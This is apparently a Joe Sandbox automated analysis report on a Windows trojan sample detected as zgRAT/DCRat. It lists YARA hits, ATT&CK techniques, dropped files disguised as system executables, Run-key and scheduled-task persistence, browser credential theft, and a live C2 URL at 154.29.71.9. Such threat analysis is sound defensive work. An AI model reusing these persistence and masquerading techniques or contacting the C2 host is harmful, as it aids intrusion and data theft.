                            Source: Yara matchFile source: 0.0.6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe.130000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1655633091.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\smartscreen.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe.130000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\smartscreen.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts241
                            Windows Management Instrumentation                            		1
                            Scripting                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		2
                            File and Directory Discovery                            		1
                            Taint Shared Content                            		11
                            Archive Collected Data                            		1
                            Encrypted Channel                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault AccountsScheduled Task/Job1
                            DLL Side-Loading                            		11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory144
                            System Information Discovery                            		Remote Desktop Protocol1
                            Data from Local System                            		1
                            Non-Application Layer Protocol                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt41
                            Registry Run Keys / Startup Folder                            		41
                            Registry Run Keys / Startup Folder                            		2
                            Obfuscated Files or Information                            		Security Account Manager341
                            Security Software Discovery                            		SMB/Windows Admin Shares1
                            Clipboard Data                            		11
                            Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                            Software Packing                            		NTDS1
                            Process Discovery                            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets261
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            File Deletion                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items133
                            Masquerading                            		DCSync1
                            Remote System Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job261
                            Virtualization/Sandbox Evasion                            		Proc Filesystem1
                            System Network Configuration Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                            Process Injection                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1584173 Sample: 6d86b21fec8d0f8698e2e22aeda... Startdate: 04/01/2025 Architecture: WINDOWS Score: 100 68 Suricata IDS alerts for network traffic 2->68 70 Found malware configuration 2->70 72 Antivirus detection for dropped file 2->72 74 17 other signatures 2->74 7 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe 11 40 2->7         started        11 System.exe 2->11         started        14 TItoGxsDkTEZBWdlQNGwopi.exe 2->14         started        16 14 other processes 2->16 process3 dnsIp4 48 C:\Windows\...\TItoGxsDkTEZBWdlQNGwopi.exe, PE32 7->48 dropped 50 C:\Users\user\Desktop\zNoaAjFw.log, PE32 7->50 dropped 52 C:\Users\user\Desktop\urdulIjK.log, PE32 7->52 dropped 60 22 other malicious files 7->60 dropped 84 Creates an undocumented autostart registry key 7->84 86 Creates autostart registry keys with suspicious values (likely registry only malware) 7->86 88 Creates multiple autostart registry keys 7->88 98 4 other signatures 7->98 18 cmd.exe 7->18         started        21 csc.exe 4 7->21         started        24 powershell.exe 23 7->24         started        26 4 other processes 7->26 64 154.29.71.9, 49731, 49733, 49736 COGENT-174US United States 11->64 54 C:\Users\user\Desktop\zaakdHBM.log, PE32 11->54 dropped 56 C:\Users\user\Desktop\rxSvtOmf.log, PE32 11->56 dropped 58 C:\Users\user\Desktop\rWndvGZf.log, PE32 11->58 dropped 62 10 other malicious files 11->62 dropped 90 Tries to harvest and steal browser information (history, passwords, etc) 11->90 92 Antivirus detection for dropped file 14->92 94 Multi AV Scanner detection for dropped file 14->94 96 Machine Learning detection for dropped file 14->96 66 127.0.0.1 unknown unknown 16->66 file5 signatures6 process7 file8 76 Uses ping.exe to sleep 18->76 78 Uses ping.exe to check the status of other devices and networks 18->78 44 4 other processes 18->44 46 C:\Windows\...\SecurityHealthSystray.exe, PE32 21->46 dropped 80 Infects executable files (exe, dll, sys, html) 21->80 28 conhost.exe 21->28         started        30 cvtres.exe 1 21->30         started        82 Loading BitLocker PowerShell Module 24->82 32 conhost.exe 24->32         started        34 WmiPrvSE.exe 24->34         started        36 conhost.exe 26->36         started        38 conhost.exe 26->38         started        40 conhost.exe 26->40         started        42 conhost.exe 26->42         started        signatures9 process10

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe61%VirustotalBrowse
                            6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe76%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                            6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe100%AviraHEUR/AGEN.1323342
                            6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Program Files (x86)\Windows NT\smartscreen.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat100%AviraBAT/Delbat.C
                            C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe100%AviraHEUR/AGEN.1323342
                            C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe100%AviraHEUR/AGEN.1323342
                            C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe100%AviraHEUR/AGEN.1323342
                            C:\Program Files (x86)\Windows NT\smartscreen.exe100%Joe Sandbox ML
                            C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe100%Joe Sandbox ML
                            C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\CeJjFnSo.log100%Joe Sandbox ML
                            C:\Program Files (x86)\Windows NT\smartscreen.exe76%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                            C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe76%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                            C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe76%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                            C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe76%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                            C:\Users\user\Desktop\AIflJiPS.log25%ReversingLabs
                            C:\Users\user\Desktop\CeJjFnSo.log29%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\Desktop\JNOIyhEg.log9%ReversingLabs
                            C:\Users\user\Desktop\KpOqUOcm.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\LHRZphiV.log17%ReversingLabs
                            C:\Users\user\Desktop\NidZFKNk.log9%ReversingLabs
                            C:\Users\user\Desktop\PxIPwdiO.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\QgDirqoj.log8%ReversingLabs
                            C:\Users\user\Desktop\SVvXiHdY.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\WepxKXjB.log17%ReversingLabs
                            C:\Users\user\Desktop\bZqOSDZv.log25%ReversingLabs
                            C:\Users\user\Desktop\dUteJCDk.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                            C:\Users\user\Desktop\fePfJVil.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\hFbfZzNA.log25%ReversingLabs
                            C:\Users\user\Desktop\iuTVQPCp.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                            C:\Users\user\Desktop\kIKeCfec.log8%ReversingLabs
                            C:\Users\user\Desktop\lniDCMno.log17%ReversingLabs
                            C:\Users\user\Desktop\npUmXvsj.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\qaACfJCc.log25%ReversingLabs
                            C:\Users\user\Desktop\rWndvGZf.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\rxSvtOmf.log29%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\Desktop\syOLALyL.log25%ReversingLabs
                            C:\Users\user\Desktop\ujtbHYJE.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\urdulIjK.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\zNoaAjFw.log25%ReversingLabs
                            C:\Users\user\Desktop\zaakdHBM.log17%ReversingLabs
                            C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe76%ReversingLabsByteCode-MSIL.Trojan.Jalapeno

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://www.t.com/pk0%Avira URL Cloudsafe
                            http://crl.microsoS0%Avira URL Cloudsafe
                            http://154.29.71.9/eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            No contacted domains info

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://154.29.71.9/eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.phptrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabuKWmKdnjVI.42.drfalse
                              		high
                              http://nuget.org/NuGet.exepowershell.exe, 00000013.00000002.2943449790.000001A890078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3049842773.000001B7555E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3016378248.0000021BBE617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.t.com/pkpowershell.exe, 00000013.00000002.3273090808.000001A8F1E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=uKWmKdnjVI.42.drfalse
                                  		high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icouKWmKdnjVI.42.drfalse
                                    		high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000013.00000002.1840605752.000001A880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1864124040.000001B745799000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1855678251.0000022355749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1857025753.0000021BAE7C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Iconpowershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=uKWmKdnjVI.42.drfalse
                                                		high
                                                https://g.live.com/odclientsettings/ProdV2.C:qmgr.db.45.drfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=uKWmKdnjVI.42.drfalse
                                                    		high
                                                    http://crl.microsoSpowershell.exe, 00000013.00000002.3295250062.000001A8F1EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.ecosia.org/newtab/uKWmKdnjVI.42.drfalse
                                                      		high
                                                      https://github.com/Pester/Pesterpowershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ac.ecosia.org/autocomplete?q=uKWmKdnjVI.42.drfalse
                                                          		high
                                                          https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000002D.00000003.1868495517.000002A23E40E000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.45.drfalse
                                                            		high
                                                            https://g.live.com/odclientsettings/ProdV2qmgr.db.45.drfalse
                                                              		high
                                                              http://crl.micropowershell.exe, 00000018.00000002.3283628819.0000021BC69D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchuKWmKdnjVI.42.drfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000013.00000002.1840605752.000001A880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1864124040.000001B745799000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1855678251.0000022355749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1857025753.0000021BAE7C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/powershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000013.00000002.2943449790.000001A890078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3049842773.000001B7555E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3016378248.0000021BBE617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://aka.ms/pscore68powershell.exe, 00000013.00000002.1840605752.000001A880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1864124040.000001B745571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1855678251.0000022355521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1857025753.0000021BAE5A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1856432912.0000018713941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1718805809.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1840605752.000001A880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1864124040.000001B745571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1855678251.0000022355521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1857025753.0000021BAE5A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1856432912.0000018713941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=uKWmKdnjVI.42.drfalse
                                                                              		high
                                                                              https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6qmgr.db.45.drfalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                154.29.71.9
                                                                                		unknownUnited States
                                                                                		174COGENT-174UStrue

                                                                                Private

                                                                                IP
                                                                                127.0.0.1

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1584173
                                                                                Start date and time:2025-01-04 14:51:08 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 10m 41s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:54
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.spre.troj.spyw.expl.evad.winEXE@47/91@0/2
                                                                                EGA Information:
                                                                                • Successful, ratio: 50%
                                                                                HCA Information:Failed
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                                • Excluded IPs from analysis (whitelisted): 23.56.254.164, 20.12.23.50, 13.107.246.45, 20.109.210.53
                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target powershell.exe, PID 7812 because it is empty
                                                                                • Execution Graph export aborted for target powershell.exe, PID 7836 because it is empty
                                                                                • Execution Graph export aborted for target services.exe, PID 5344 because it is empty
                                                                                • Execution Graph export aborted for target services.exe, PID 6020 because it is empty
                                                                                • Execution Graph export aborted for target services.exe, PID 7056 because it is empty
                                                                                • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                08:52:05API Interceptor139x Sleep call for process: powershell.exe modified
                                                                                08:52:18API Interceptor2574179x Sleep call for process: System.exe modified
                                                                                08:52:19API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                13:52:03Task SchedulerRun new task: services path: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                13:52:03Task SchedulerRun new task: servicess path: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                13:52:04Task SchedulerRun new task: smartscreen path: "C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                13:52:04Task SchedulerRun new task: smartscreens path: "C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                13:52:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                13:52:05Task SchedulerRun new task: System path: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                13:52:05Task SchedulerRun new task: SystemS path: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                13:52:05Task SchedulerRun new task: TItoGxsDkTEZBWdlQNGwopi path: "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
                                                                                13:52:05Task SchedulerRun new task: TItoGxsDkTEZBWdlQNGwopiT path: "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
                                                                                13:52:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                13:52:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                13:52:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopi "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
                                                                                13:52:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                13:52:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                13:52:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                13:53:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopi "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
                                                                                13:53:15AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                13:53:23AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                13:53:32AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                13:53:41AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopi "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
                                                                                13:53:58AutostartRun: WinLogon Shell "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                13:54:06AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                13:54:15AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                13:54:23AutostartRun: WinLogon Shell "C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe"
                                                                                13:54:32AutostartRun: WinLogon Shell "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                No context

                                                                                Domains

                                                                                No context

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                COGENT-174USfuckunix.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 38.95.31.31
                                                                                fuckunix.x86.elfGet hashmaliciousMiraiBrowse
                                                                                • 38.3.112.85
                                                                                Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 38.162.253.66
                                                                                Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                                                                                • 23.154.10.226
                                                                                Fantazy.mips.elfGet hashmaliciousUnknownBrowse
                                                                                • 38.114.1.137
                                                                                Fantazy.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                • 66.28.124.96
                                                                                Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                • 38.168.213.17
                                                                                armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                • 38.148.27.213
                                                                                m68k.elfGet hashmaliciousUnknownBrowse
                                                                                • 50.7.22.221
                                                                                1.elfGet hashmaliciousUnknownBrowse
                                                                                • 154.36.91.181

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                C:\Users\user\Desktop\AIflJiPS.logaW6kSsgdvv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  HMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    kJrNOFEGbQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      lEwK4xROgV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          zZ1Y43bxxV.exeGet hashmaliciousDCRatBrowse
                                                                                            VqGD18ELBM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              updIMdPUj8.exeGet hashmaliciousDCRatBrowse
                                                                                                t8F7Ic986c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  544WP3NHaP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                    Created / dropped Files

                                                                                                    C:\Program Files (x86)\Windows NT\2afe4ed40d5a86

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with very long lines (329), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):329
                                                                                                    Entropy (8bit):5.840065784671832
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:pV9/gUrAdpvBI2OCZwUQAERiORfd/HL4+cnxhHawqntEF0bf1yu:DFArv2EQXtRVH+nWwqne+L
                                                                                                    MD5:A6615291280882E3FDB7E6CED16663D9
                                                                                                    SHA1:D81035AFA2D6073DD964387FD88E3395DDAD234C
                                                                                                    SHA-256:AF2A39B3CFB4205A2603AA1583D35A2D4C5952A8E091DA8FD875DD37B5874D79
                                                                                                    SHA-512:409AE4AEF22636D78DE5D0573324BBD4E3BC2F2410DC06B7679B38C2C5F52D86529E92E63898988B23D15CBCD22DEBE3A782D4C861D2D8DA6D2F496BB949CC8E
                                                                                                    Malicious:false
